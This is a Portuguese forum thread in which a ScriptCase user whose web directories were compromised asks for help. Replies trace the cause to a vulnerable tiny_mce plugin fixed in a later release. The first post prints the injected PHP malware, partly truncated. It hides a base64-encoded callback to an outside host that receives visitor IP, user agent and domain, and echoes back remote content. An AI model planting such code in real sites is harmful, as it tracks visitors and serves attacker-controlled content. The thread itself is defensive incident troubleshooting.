Invasão no arquivo Scriptcase

ScriptCase Versão 8
#1

Bom dia pessoal!

Gostaria de uma possivel ajuda de vcs.

O Host do scriptcase me informou que dentro de 2 diretorios meus estão com problemas e podem ter sido invadidos, são eles:
/home/wagnerbo/public_html/appwb/
/home/wagnerbo/public_html/scaseprod52/

E que em todos os arquivos dos diretórios em questão exite o conteúdo:

Em todos os arquivos dos diretórios em questão exite o conteúdo: <?php session_start(); ?><?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&$ { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTT$ $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } }

O qual o base64 aponta para hotlogupdate.com.

Não possuo mai este código aberto no scriptcase para mexer dentro do sistema.

O que posso fazer?

Agradeço desde já a ajuda de vcs.

#2

Todos os fontes foram substituídos por este conteúdo, ou o conteúdo foi “apendado” ao inicio fonte?

#3

Bruno,

Estou verificando os arquivos e eu nem estou achando. Perguntei ao Host da Scriptcase aonde tenho o sistema e ainda não responderam.
Se for como falaram em todos os arquivos eu já teria achado.

#4

Bruno, achei este arquivo agora: cript.inc.php

Tem a base64 que esta informando no arquivo, mas não o link para o hotlogupdate.com

Renomeie o arq para.php

crypt.inc.doc (13.7 KB)

#5

Achei o arquivo.

Agora não sei se é só retirá-lo apena, ou se retirar vai dar problema na aplicação.

Este arquivo está dentro da raiz da aplicação appwb/

Segue em anexo pra ver se me ajudam.
Basta renomear o arquivo para .php

Agradeço a ajuda

index.doc (1.43 KB)

#6

Poderia informar a versão do PHP e a do seu SC que está em produção ?

Segurança - Invasão
#7

Adriana,
Versão antigas do Scriptcase tem um furo de segurança.
Procure no Fórum Scriptcase: invasão.
Se sua versão for afetada por este furo de segurança recomendo atualizar.

PS: Achei: http://www.scriptcase.com.br/forum/index.php/topic,14017.msg73537.html#msg73537
Cito o que o Yuri falou:
Prezados, bom dia!

O problema foi corrigido na release 8.1.053. Versão disponivel para download e atualização.

Para os que realizaram uma publicação do tipo típica, será necessário publicar novamente. Para os que publicam de forma avançada, só precisa atualizar o ambiente de produção no servidor.

O problema estava no plugin que não era mais usado no Scriptcase.

Uma dica: Nos diretórios onde ficam armazenados os arquivos de upload é sempre bom remover a permissão de execução.

Agradecemos a colaboração de todos e estaremos andando juntos para a cada dia melhorar mais o Scriptcase.
Obrigado!

#8

Identificamos que o processo estava sendo gerado pelo arquivo em:
…/_lib/prod/third/tiny_mce/themes/simple/skins/o2k7/o2k7.php

Possivelmente, uma falha do plugin ou do tema utilizado na versão do tiny_mce utilizado na versão 5.2 do Scriptcase.